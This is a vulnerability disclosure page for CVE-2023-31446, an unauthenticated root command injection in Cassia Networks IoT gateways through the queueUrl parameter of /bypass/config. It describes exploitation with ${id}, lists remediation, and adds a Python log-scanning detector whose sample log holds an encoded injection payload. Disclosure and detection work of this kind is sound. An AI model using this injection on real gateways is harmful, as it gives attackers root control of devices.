
CVE-2023-31446 PoC — Cassia Networks Gateway Security Vulnerability

Associated Vulnerability
Title: Cassia Networks Gateway Security Vulnerability (CVE-2023-31446)
Description: Cassia Networks Gateway is an IoT gateway from Cassia Networks. Cassia Networks Gateway versions XC1000_2.1.1.2303082218 and XC2000_2.1.1.2303090947 contain a security vulnerability that stems from the queueUrl parameter in /bypass/config not being sanitized.
Description
Repository contains description for CVE-2023-31446
Readme
# CVE-2023-31446-Remote-Code-Execution
Repository contains description for CVE-2023-31446 discovered by Dodge Industrial Team for Dodge OPTIFY platform.
___  
CVE ID: CVE-2023-31446  
Vendor: Cassia Networks    
Product: Cassia Gateway Firmware  
Version: <2.1.1.230309*
___
Vulnerability: Remote Code Execution/Remote Code Injection  
Affected: gateways  
Description: The *queueUrl* parameter in */bypass/config* is not sanitized. This allows bash code to be injected and executed with root privileges on device startup.  
Status: Confirmed by vendor, Fixed  
Version Patched: 2.1.1.230720*
____
#### Details
Cassia has in the past implemented a function that allows Gateways to push Bluetooth scan data to Amazon SQS.  
The settings for this functionality can be set through the following API endpoint:
> http://<ip>/bypass/config?type=sqs&keyId=<"keyId">&key=<"keysecret">&queueUrl=<"queueServiceUrl">  

Based on the investigation, the SQS feature starts its service at device boot time.  
The service loads a configuration file whose settings the endpoint above overwrites.  
After loading the specified URL, the service runs nslookup from a root bash context, which allows any command embedded in the URL parameter to be executed.  
Access to the endpoint is not authenticated by default. Moreover, the feature is not described in the official Cassia documentation.
____
#### Exploitation

An attacker can embed the bash command ${id} into the *queueUrl* parameter:
![query](img/1.png)  

After the device reboots, the gateway runs the command with root privileges (see the A and AAAA DNS queries):
![capture](img/2.png)  

##### *Note that a Linux device was used as the gateway's default gateway to make capturing the network flow and evidence easier*
Gateway -> Default Gateway (Linux) -> Internet

#### Remediation
- Enable and require API authentication (if your version supports it)
- Monitor traffic to the gateway API
- Patch to the highest version available from [Cassia Networks](https://www.cassianetworks.com/)
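The second remediation item, monitoring traffic to the gateway API, can be turned into a concrete check. The script below is an added example and is not code from the PoC repository or from Cassia Networks. It assumes HTTP requests to the gateway have been captured as Common Log Format lines (the sample lines are constructed, using documentation IP ranges and a fake key id) and reports every call to the undocumented `/bypass/config` endpoint, escalating the severity when the `queueUrl` value carries shell-expansion syntax such as `${...}` or `$(...)`, or does not have the shape of a genuine SQS queue URL (the SQS URL pattern used for that check is an assumption of this example).

```python
"""Detection helper for the remediation item "monitor traffic to the gateway API".

Added example; not code from the PoC repository or from Cassia Networks.
Assumes gateway HTTP traffic has been captured as Common Log Format lines
(the SAMPLE_LOG entries below are constructed).
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Shell expansion and command-separator syntax that never belongs in a queue URL.
SHELL_META = re.compile(r"\$\{|\$\(|`|;|\|\||&&|\n|\r")

# Assumed shape of a genuine SQS queue URL, used only as an allow-list:
# https://sqs.<region>.amazonaws.com/<12-digit account id>/<queue name>
SQS_URL = re.compile(r"^https://sqs\.[a-z0-9-]+\.amazonaws\.com/\d{12}/[A-Za-z0-9_.-]{1,80}$")

# Common Log Format: src ident user [time] "METHOD target PROTO" status size
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

REASON_META = "shell metacharacters in queueUrl"
REASON_SHAPE = "queueUrl is not a well-formed SQS queue URL"


def inspect_target(target):
    """Classify one request target.

    Returns (hits_bypass_config, reasons). reasons is empty when the call looks
    like legitimate SQS configuration; the call is still reported because the
    endpoint is undocumented and unauthenticated by default.
    """
    parts = urlsplit(target)
    if parts.path != "/bypass/config":
        return False, []
    params = parse_qs(parts.query, keep_blank_values=True)
    reasons = []
    for raw in params.get("queueUrl", []):
        value = unquote(raw)  # parse_qs decoded once; a second pass catches double encoding
        if SHELL_META.search(value):
            reasons.append(REASON_META)
        elif not SQS_URL.match(value):
            reasons.append(REASON_SHAPE)
    return True, reasons


def severity_for(reasons):
    if REASON_META in reasons:
        return "critical"  # injection attempt: the payload would run as root on next boot
    if reasons:
        return "high"      # endpoint pointed at a non-SQS destination
    return "medium"        # undocumented, unauthenticated endpoint used at all


def scan_log(lines):
    """Return one finding per request that touched /bypass/config."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        hit, reasons = inspect_target(m["target"])
        if hit:
            findings.append({
                "src": m["src"],
                "status": m["status"],
                "target": m["target"],
                "severity": severity_for(reasons),
                "reasons": reasons,
            })
    return findings


# Constructed sample log lines (RFC 5737 documentation addresses, fake key id).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Jun/2023:10:01:02 +0000] "GET /api/status HTTP/1.1" 200 512',
    '192.0.2.10 - - [12/Jun/2023:10:01:05 +0000] "GET /bypass/config?type=sqs&keyId=AKIAEXAMPLE&key=secret'
    '&queueUrl=https://sqs.eu-west-1.amazonaws.com/123456789012/ble-scans HTTP/1.1" 200 17',
    '198.51.100.7 - - [12/Jun/2023:10:02:44 +0000] "GET /bypass/config?type=sqs&keyId=x&key=y'
    '&queueUrl=http://%24%7Bid%7D.example.invalid/q HTTP/1.1" 200 17',
    '198.51.100.7 - - [12/Jun/2023:10:03:00 +0000] "GET /bypass/config?type=sqs&keyId=x&key=y'
    '&queueUrl=http://example.invalid/q HTTP/1.1" 200 17',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity']:8} {f['src']:14} {f['reasons'] or ['undocumented endpoint used']}")
```

Because the endpoint is undocumented, any request to it is worth a ticket even when the parameters look benign; the severity ladder only decides how fast someone looks at it. Since the injected command runs on the next boot rather than immediately, a hit should also be correlated with subsequent reboot events and unexpected outbound DNS lookups from the gateway.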
File Snapshot

[4.0K] /data/pocs/657e0132fb75c6a72f25f6923a27142b7938485a
├── [4.0K] img
│   ├── [ 36K] 1.png
│   └── [ 90K] 2.png
└── [1.9K] README.md

1 directory, 3 files